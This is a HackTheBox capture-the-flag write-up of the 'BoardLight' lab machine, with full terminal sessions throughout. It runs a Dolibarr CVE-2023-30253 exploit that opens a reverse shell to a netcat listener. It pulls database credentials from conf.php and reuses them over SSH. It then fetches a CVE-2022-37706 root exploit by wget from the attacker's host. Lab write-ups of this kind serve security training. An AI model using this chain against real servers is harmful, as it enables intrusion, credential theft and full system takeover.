HackTheBox: BoardLight
BoardLight is an easy box on HackTheBox where we start by exploiting a vulnerability in the Dolibarr web application, using default credentials to gain access. We then pivot to a user account by leveraging database credentials found in the configuration file. Finally, we escalate privileges by exploiting a vulnerability in Enlightenment (CVE-2022-37706) to gain root access and obtain the root.txt file.
Enumeration
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight]
└─$ nmap -sC -sV 10.10.11.11 -T4 -oN boardlight.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 17:55 BST
Nmap scan report for 10.10.11.11
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.99 seconds
Looking at the result, we got 2 open ports.
- 22/SSH - open
- 80/HTTP - open
Web Server
Checking http://10.10.11.11 we got web site for a Cybersecurity Consulting Firm.
Going down a bit, we find a hostname board.htb.
Adding that to our /etc/hosts file.
1
2
3
4
5
6
7
8
127.0.0.1 localhost
127.0.1.1 Voldemort
10.10.11.11 board.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
So the first thing we did is enumerating subdomains, using ffuf we were able to hit a subdomain crm.board.htb.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight]
└─$ ffuf -w ~/Desktop/subdomains-top1million-20000.txt -H "Host: FUZZ.board.htb" -u http://board.htb -fs 15949
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /home/Str4ngerX/Desktop/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 15949
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 834ms]
:: Progress: [19966/19966] :: Job [1/1] :: 56 req/sec :: Duration: [0:02:39] :: Errors: 0 ::
Adding that to our /etc/hosts file.
1
2
3
4
5
6
7
8
127.0.0.1 localhost
127.0.1.1 Voldemort
10.10.11.11 board.htb crm.board.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Taking a look at http://crm.board.htb, we found a Dolibarr web appplication.
Exploitation
Initial Footsteps
Checking for any vulnerabilities for Dolibarr 17.0.0 using searchsploit we don’t get anything interesting, digging a bit more on google we found a POC for a PHP Code Injection (CVE-2023-30253) but we still need credentials in order to execute the exploit.
Trying some basic credentials we got a hit with admin:admin and got access to the admin panel.
Cloning and executing the python script we get the arguments we need to supply
- Target hostname:
http://crm.board.htb. - Username: admin.
- Password: admin.
- Lhost: Our IP Address.
- Lport: Our Local Port.
1
2
3
4
5
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python3 exploit.py
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001
exploit.py: error: the following arguments are required: hostname, username, password, lhost, lport
Setting up a listener using netcat and executing the python script we get a shell!
1
2
3
4
5
6
7
8
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python3 exploit.py http://crm.board.htb admin admin 10.10.15.7 4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
1
2
3
4
5
6
7
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.7] from (UNKNOWN) [10.10.11.11] 40432
bash: cannot set terminal process group (847): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
User Pivoting
Once a shell is established we need a way to pivot to other users. Looking for internal open ports we find a mysql server running on port 3306.
1
2
3
4
5
6
7
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 511 *:80 *:*
Looking for the config file of Dolibarr over google, we find this wiki blog.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@boardlight:~/html/crm.board.htb/htdocs$ cd conf/
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='[REDACTED]';
$dolibarr_main_db_type='mysqli';
[...]
Looking for users on the host, we found larissa so we decide to try and log in to that user using the password we found in the config file and it worked!
1
2
3
4
5
6
7
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight]
└─$ ssh larissa@board.htb
larissa@board.htb's password:
Last login: Tue Jul 23 14:41:15 2024 from 10.10.15.7
larissa@boardlight:~$ ls
Desktop Documents Downloads Music Pictures Public Templates user.txt Videos
larissa@boardlight:~$
Privilege Escalation
After enumerating the whole system we found an odd util with an SUID on which is enlightenment.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
larissa@boardlight:/tmp$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper
Googling that out trying to find any vulnerabilities, we found a github repository mentioning a 0-day exploit on enlightenment (CVE-2022-37706).
Cloning the repository, we can now transfer the exploit into the victim machine and execute it in order to become root.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight]
└─$ git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit.git
Cloning into 'CVE-2022-37706-LPE-exploit'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (92/92), done.
remote: Compressing objects: 100% (92/92), done.
remote: Total 92 (delta 32), reused 14 (delta 0), pack-reused 0
Receiving objects: 100% (92/92), 498.76 KiB | 644.00 KiB/s, done.
Resolving deltas: 100% (32/32), done.
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/HackTheBox/BoardLight]
└─$ ls CVE-2022-37706-LPE-exploit
PublicReferenceURL.txt README.md exploit.sh screenshots
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
larissa@boardlight:/tmp$ wget http://10.10.15.7:8000/exploit.sh
--2024-07-23 15:15:34-- http://10.10.15.7:8000/exploit.sh
Connecting to 10.10.15.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [text/x-sh]
Saving to: ‘exploit.sh’
exploit.sh 100%[=======================================================>] 709 --.-KB/s in 0s
2024-07-23 15:15:34 (70.2 MB/s) - ‘exploit.sh’ saved [709/709]
larissa@boardlight:/tmp$ chmod +x exploit.sh
larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
# ls /root
root.txt snap
And there we go, we’re now root and can consider BoardLight as Pwned ! 🎉